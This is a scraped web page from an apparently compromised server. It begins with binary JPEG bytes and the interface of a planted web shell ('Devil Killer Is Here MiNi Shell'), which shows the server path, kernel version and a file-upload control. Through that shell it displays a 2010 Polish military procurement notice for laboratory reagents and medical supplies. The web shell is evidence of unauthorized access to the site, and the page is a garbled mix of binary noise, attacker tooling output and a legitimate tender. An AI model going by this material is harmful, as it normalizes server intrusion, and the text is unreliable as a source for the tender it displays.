JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100719/214354-N-2010.html

<p class="kh_header"><b>Kazuń Nowy: 7/ZP/WOMP/ICH/2010</b><br>
<b>Numer ogłoszenia: 214354 - 2010; data zamieszczenia: 19.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 2189 , 05-154 Kazuń Nowy, woj. mazowieckie, tel. 022 6861010, faks 022 6861015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> jw2189zamowieniapubliczne@ip-point.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 7/ZP/WOMP/ICH/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowią trzy - 3 główne część przedmiotu zamówienia, które zamawiający podzielił na części - pakiet. Wszystkich części jest 25. Szacunkowa wartość zamówienia nie przekracza kwoty określonej w przepisach wydanych na podstawie art. 11 ust 8 ustawy P. z. p.: 

Część I  na dostawę

ODCZYNNIKÓW CHEMICZNYCH i LABORATORYJNYCH oraz PRODUKTÓW FARMACEUTYCZNYCH nazwane przez Zamawiającego jako leki nr 1 i Nr 2  dla Wojskowego Ośrodka Medycyny Prewencyjnej w Modlinie. 
Oznaczenie wg CPV: 33696300-8, 33696500-0, 33600000-6.
Przedmiot zamówienia zawiera się w części I z  9 części nazwanych przez Zamawiającego  pakietami opisanymi szczegółowo w załącznikach Nr 1A 
i Nr 5A do SIWZ.

Część II  na dostawę

SPRZĘTU I MATERIAŁÓW MEDYCZNYCH ORAZ JEDNORAZOWEGO UŻYTKU I NIE CHEMICZNE ARTYKUŁY MEDYCZNE dla Wojskowego Ośrodka Medycyny Prewencyjnej w Modlinie. 
Oznaczenie wg CPV:33141000-0,
38000000-5,19520000-7,33790000-4.
Przedmiot zamówienia zawiera się w części II z  14 części nazwanych przez Zamawiającego pakietami  opisanymi szczegółowo w załącznikach Nr 1A i Nr 5A do SIWZ.

Część III na dostawę

URZĄDZEŃ MEDYCZNYCH, DODATKOWYCH WYROBÓW ORTOPEDYCZNYCH , KOSZY NA ODPADY MEDYCZNE oraz APTECZKI SAMOCHODOWE i PRZEMYSŁOWE wraz z wyposażenie dla Jednostki Wojskowej 2189 w Kazuniu Nowym z przeznaczeniem dla Izby Chorych
Oznaczenie wg CPV:33100000-1,33183000-6,34928480-8, 
33141620-2,33141000-0.
Przedmiot zamówienia zawiera się w części III z  2 części nazwanej przez Zamawiającego pakietem Nr 1 i Nr 2 opisanym szczegółowo w załączniku 
Nr 1B i Nr 5B do SIWZ.
Szczegółowy opis przedmiotu zamówienia zawierają formularze OFERTA CENOWA  na poszczególne części zamówienia, które Zamawiający podzielił na pakiety  stanowiące integralną część SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8, 33.14.10.00-0, 33.60.00.00-6, 34.92.84.80-0, 38.00.00.00-5, 38.40.00.00-9, 33.79.00.00-4, 19.52.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 25.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego określonego w Rozdziale III SIWZ mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące i określone w art. 22 ust.1 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, tj.:
a.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, 
jeśli przepisy prawa nakładają obowiązek ich posiadania, które określają przepisy Ustawy z dnia 2 lipca 2004r. o swobodzie prowadzenia działalności gospodarczej (Dz. U. z 2004r. Nr 173 poz. 1807 wraz z późn. zm.);
b.	posiadają wiedzę i doświadczenie;
c.	dysponuję odpowiednim potencjałem technicznym oraz  osobami zdolnymi 
do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (zadania);
d.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zadania (zamówienia);
e.	nie podlegają wykluczeniu na podstawie przepisów art. 24 ust. 1 Ustawy P.z.p.
f.	w przypadku korzystania z podwykonawców Zamawiający żąda 
od Wykonawcy wskazania w złożonej ofercie zakresu zamówienia, który zostanie powierzony podwykonawcy.
g.	Wykonawcy mogą ubiegać się wspólnie o udzielenie zamówienia (np. konsorcjum,  spółka cywilna)
h.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
i.	Wykonawcy którzy nie wykażą spełnienia warunków udziału w postępowaniu, podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą. 
j.	Zamawiający odrzuci ofertę jeżeli:
-  jest niezgodna z ustawą,
-  jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
     z zastrzeżeniem art. 87 ust. 2 pkt 3,
- jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów 
    o zwalczaniu nieuczciwej konkurencji,
-  zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
-  została złożona przez wykonawcę wykluczonego z udziału w postępowaniu 
   o udzielenie zamówienia,
-  zawiera błędy w obliczeniu ceny,
- wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził 
   się  na   poprawienie omyłki, o której mowa w art.87 ust. 2 pkt 3,
- jest nieważna na podstawie odrębnych przepisów.
    k. O wykluczeniu z postępowania oraz o odrzuceniu oferty wykonawcy zostaną zawiadomieni niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty. Zawiadomienie zawierać będzie  uzasadnienie faktyczne i prawne.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o oświadczenie o spełnianiu warunku, zgodnie z Załącznikiem Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o oświadczenie o spełnianiu warunku, zgodnie z Załącznikiem Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o oświadczenie o spełnianiu warunku, zgodnie z Załącznikiem Nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o oświadczenie o spełnianiu warunku, zgodnie z Załącznikiem Nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełnioną i podpisaną Ofertę Formularz Ofertowy wraz z Ofertą Cenową wg wzoru Zamawiającego - odpowiednio (Załączniki: Nr 1A i 1B, oraz Załączniki nr 5A i 5B do SIWZ na które Wykonawca składa Ofertę- Oferty dotyczącą danej Części - Pakietu. Parafowany wzór umowy wg Załącznika Nr 4 do SIWZ. Pełnomocnictwo dla osób(y) podpisującej ofertę w imieniu Wykonawcy; Wykonawcy mogą ubiegać się wspólnie (np. spółka cywilna) o udzielenie zamówienia wówczas zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego; Kopię umowy lub inny dokument potwierdzający zawarcie konsorcjum - spółki cywilnej, podpisanych przez wszystkich partnerów, przy czym termin na jaki została zawarta umowa konsorcjum nie może być krótszy niż termin realizacji zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ na wniosek złożony na adres siedziby Zamawiającego lub pobierany w siedzibie Zamawiającego - Budynek Sztabu JW 2189 nr 5, pok. nr 5; SIWZ przekazywany jest nieodpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2010 godzina 10:00, miejsce: w siedzibie Zamawiającego do kancelarii jawnej - budynek sztabu lub drogą pocztową - Jednostka Wojskowa 2189 w Kazuniu Nowym, 05-152 Czosnów. Koperta opisana zgodnie z rozdziałem XV SIWZ..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1 - Odczynniki do ASA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I Odczynniki chemiczne i laboratoryjne oraz produkty farmaceutyczne - leki. Kwas azotowy do analizy śladowej metali BAKER INSTRA-ANALYZED op 0,5dm3, certyfikat. Szczegółowe wymagania określono w załączniku Nr 5A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.63.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet Nr 2 - Testy lateksowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - ODCZYNNIKI CHEMICZNE I LABORATORYJNE ORAZ PRODUKTY FARMACEUTYCZNE - LEKI. Opis przedmiotu zamówienia - materiał, jego ilości i szczegółowe wymagania zamawiający określił w załączniku nr 5A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet Nr 3 - Surowice do diagnostyki do badań na nosicielstwo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - ODCZYNNIKI CHEMICZNE I LABORATORYJNE ORAZ PRODUKTY FARMACEUTYCZNE - LEKI. Opis przedmiotu zamówienia asortymentu - materiału jego ilości i szczegółowe wymagania zamawiający określił w załączniku Nr 5A do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet Nr 4 - Odczynniki do Real Time PCR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I  - ODCZYNNIKI CHEMICZNE I LABORATORYJNE ORAZ PRODUKTY FARMACEUTYCZNE - LEKI. Opis przedmiotu zamówienia asortyment - materiał jego ilości i szczegółowe wymagania zamawiający określił w załączniku nr 5A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet Nr 5 - Odczynniki do kontroli procesu sterylizacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - ODCZYNNIKI CHEMICZNE I LABORATORYJNE ORAZ PRODUKTY FARMACEUTYCZNE - LEKI. Opis przedmiotu zamówienia asortyment - materiał, jego ilości i szczegółowe wymagania zamawiający określił w załączniku nr 5A do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet Nr 6 Szczepy Wzorcowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - ODCZYNNIKI CHEMICZNE I LABORATORYJNE ORAZ produkty farmaceutyczne - leki. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet Nr 7 - leki - produkty farmaceutyczne Nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - ODCZYNNIKI CHEMICZNE I LABORATORYJNE ORAZ produkty farmaceutyczne - leki. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.13.00-3, 33.66.11.00-2, 33.61.00.00-9, 33.61.70.00-8, 33.63.00.00-5, 33.66.21.00-9, 33.69.12.00-2, 33.65.16.90-1, 33.64.22.00-4, 33.69.12.00-2, 33.63.10.00-2, 33.60.00.00-6, 33.63.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet Nr 8 - leki - produkty farmaceutyczne Nr II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - ODCZYNNIKI CHEMICZNE I LABORATORYJNE ORAZ produkty farmaceutyczne - leki. OPIS PRZEDMIOTU ZAMÓWIENIA ASORTYMENT - MATERIAŁ JEGO ILOŚCI I SZCZEGÓŁOWE WYMAGANIA ZAMAWIAJĄCY OKREŚLIŁ W ZAŁĄCZNIKU NR 5A DO SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.10.00-2, 33.63.00.00-5, 33.61.00.00-9, 33.65.16.90-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet Nr 9 - Dodatkowe odczynniki do badań z ognisk epidemiologicznych.</p>
